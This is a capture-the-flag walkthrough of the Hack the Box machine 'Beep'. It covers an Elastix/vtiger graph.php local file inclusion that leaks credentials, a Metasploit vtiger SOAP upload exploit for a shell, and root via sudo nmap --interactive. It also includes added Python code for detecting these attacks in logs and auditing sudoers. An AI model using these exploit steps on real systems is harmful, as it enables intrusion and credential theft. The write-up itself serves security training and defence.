Hack the Box – Beep Walkthrough

Today we’re going to solve another CTF machine, “Beep”. It is now a retired box and can be accessed if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: 22, 25, 80, 110, 111, 143, 443, 993, 995, 3306, 4445, 10000
  • IP Address: 10.10.10.7
  • Difficulty: Medium

Weakness

  • LFI vulnerability
  • Sudo NOPASSWD

Contents

  • Getting user
  • Getting root


Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host        port   proto  name       state  info
----        ----   -----  ----       -----  ----
10.10.10.7  22     tcp    ssh        open   OpenSSH 4.3 protocol 2.0
10.10.10.7  25     tcp    smtp       open   Postfix smtpd
10.10.10.7  80     tcp    http       open   Apache httpd 2.2.3
10.10.10.7  110    tcp    pop3       open   Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  111    tcp    rpcbind    open   2 RPC #100000
10.10.10.7  143    tcp    imap       open   Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  443    tcp    ssl/http   open   Apache httpd 2.2.3 (CentOS)
10.10.10.7  993    tcp    ssl/imap   open   Cyrus imapd
10.10.10.7  995    tcp    pop3       open   Cyrus pop3d
10.10.10.7  3306   tcp    mysql      open   MySQL unauthorized
10.10.10.7  4445   tcp    upnotifyp  open   
10.10.10.7  10000  tcp    http       open   MiniServ 1.570 Webmin httpd

We have quite a long list of services. HTTP is running, so that is our primary target for now.

Enumerate Directories

We get a huge list of directories because there’s an Elastix CMS installed on Apache.

Let’s run searchsploit elastix.

To read

searchsploit -x php/webapps/37637.pl

To copy exploit to current directory

searchsploit -m php/webapps/37637.pl .

Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
    URL: https://www.exploit-db.com/exploits/37637/
   Path: /usr/share/exploitdb/platforms/php/webapps/37637.pl

Copied to: /root/Documents/hackthebox/10.10.10.7/37637.pl

The proof of concept is extremely simple. Browsing to https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action exposes the AMPortal credentials: the null byte (%00) truncates the include path, so the script reads /etc/amportal.conf instead of a language file.

The box is vulnerable to password reuse, and it is possible to SSH in directly as the root user with the AMPDBPASS password.
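As an added example (not from the original post, and not Elastix or vtiger code), here is how a defender might spot this graph.php request in Apache access logs, and what the fix looks like on the application side. The log lines are constructed, and LANGUAGES plus the languages/ file layout are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache access-log lines, not from the original post. The first
# reproduces the graph.php request quoted above; the third carries the same
# traversal double percent-encoded, which a single decode would miss.
SAMPLE_LOG = """\
10.10.14.5 - - [04/Dec/2017:13:06:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 2113
10.10.14.5 - - [04/Dec/2017:13:06:02 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action=index HTTP/1.1" 200 3022
10.10.14.5 - - [04/Dec/2017:13:06:03 +0000] "GET /vtigercrm/index.php?module=Accounts&file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # "../", "..\" or a bare ".."


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %252e is seen as '.'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> list:
    """Names of query parameters whose value contains traversal or a null byte."""
    hits = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)
        if "\x00" in value or TRAVERSAL_RE.search(value):
            hits.append(name)
    return hits


def scan_log(text: str) -> list:
    """(request target, flagged parameter names) for every suspicious log line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (hits := suspicious_params(m.group("target"))):
            findings.append((m.group("target"), hits))
    return findings


# Application-side fix: never build an include path from the raw parameter; map it
# onto an allowlist. LANGUAGES and the languages/ layout are hypothetical.
LANGUAGES = {"en_us", "es_es", "de_de"}


def language_file(requested: str, default: str = "en_us") -> str:
    lang = requested if requested in LANGUAGES else default
    return f"languages/{lang}.php"
```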


Method 2

There’s another method to root this box. Let’s start over from the same port scan.

Enumerate Directories

We get a huge list of directories because there’s an Elastix CMS installed on Apache.

We have a login form; we could either brute force it or look for an SQL injection vulnerability. I tested both but couldn’t find anything.

Let’s dig more into directories and see if we can find anything.

https://10.10.10.7/vtigercrm/

We can see another login portal, for vtiger CRM 5.1.0 🙂 The first thing we should do is searchsploit vtiger.

We also found some Metasploit modules, so let’s test them first to save time.

msf > search vtiger

Matching Modules
================

   Name                                   Disclosure Date  Rank       Description
   ----                                   ---------------  ----       -----------
   exploit/multi/http/vtiger_install_rce  2014-03-05       manual     Vtiger Install Unauthenticated Remote Command Execution
   exploit/multi/http/vtiger_php_exec     2013-10-30       excellent  vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution
   exploit/multi/http/vtiger_soap_upload  2013-03-26       excellent  vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload

We found our exploit, let’s use it.

use exploit/multi/http/vtiger_soap_upload

After running the exploit we got an error; let’s take a look at it.

If you remember, the server also has SSL on port 443, and this exploit has an option to use SSL. Let’s enable it.

msf exploit(vtiger_soap_upload) > set SSL true
msf exploit(vtiger_soap_upload) > set RPORT 443

After executing it we got a shell 🙂

Inside the /home/fanis directory we found our user.txt flag.

Privilege Escalation

It’s time to get root.txt. We could use privilege escalation scripts to gather information, or do some manual research first to save time.

If you run sudo -l you can see many NOPASSWD commands, which can lead us to root.

sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

nmap is in the list, and if you google nmap privilege escalation you can find this command 🙂

sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -la
total 16308
drwxr-x---  2 root root     4096 Apr  7  2017 .
drwxr-xr-x 22 root root     4096 Dec  2 23:23 ..
-rw-------  1 root root     1130 Dec  4 13:06 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-rw-------  1 root root     6025 Apr  7  2017 anaconda-ks.cfg
-r-xr-xr-x  1 root root   190461 Aug 10  2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r--  1 root root    18433 Apr  7  2017 install.log
-rw-r--r--  1 root root        0 Apr  7  2017 install.log.syslog
-rw-r--r--  1 root root        1 Apr  7  2017 postnochroot
-rw-------  1 root root       33 Apr  7  2017 root.txt
-r-xr-xr-x  1 root root 16358730 Oct 31  2011 webmin-1.570-1.noarch.rpm
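On the defender’s side, an added Python example (not part of the original walkthrough) that audits the sudo -l output above for NOPASSWD root entries and flags sudo log records that used nmap’s interactive mode. The sudo log lines are constructed; /var/log/secure is where CentOS writes them by default.

```python
import re

# sudo -l output for the asterisk user (excerpt copied from the walkthrough above).
SUDO_L = """\
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
"""

# Constructed sudo syslog lines, not from the original post. The first is the
# record the nmap --interactive escape above leaves in /var/log/secure on CentOS.
SUDO_LOG = """\
Dec  4 13:06:10 beep sudo: asterisk : TTY=pts/0 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/nmap --interactive
Dec  4 13:07:42 beep sudo: asterisk : TTY=pts/0 ; PWD=/var/www/html ; USER=root ; COMMAND=/sbin/service httpd restart
Dec  4 13:08:03 beep sudo: asterisk : TTY=pts/0 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/bin/nmap -sP 10.10.10.0/24
"""

ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S.*)$")
LOG_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

# Arguments that turn a permitted binary into a root shell. Only the escape shown
# on this page is listed; extend it from your own sudoers review.
SHELL_ESCAPES = {"/usr/bin/nmap": {"--interactive"}}


def nopasswd_root_commands(sudo_l_text: str) -> list:
    """Commands the user may run as root with no password prompt at all."""
    found = []
    for line in sudo_l_text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root)" or "(root : root)"
        tags = set(m.group("tags").replace(":", " ").split())
        if runas in ("root", "ALL") and "NOPASSWD" in tags:
            found.append(m.group("cmd").strip())
    return found


def shell_escape_events(log_text: str) -> list:
    """(user, command line) for every sudo run that used a known shell-escape flag."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        if argv and SHELL_ESCAPES.get(argv[0], set()) & set(argv[1:]):
            events.append((m.group("user"), m.group("cmd")))
    return events
```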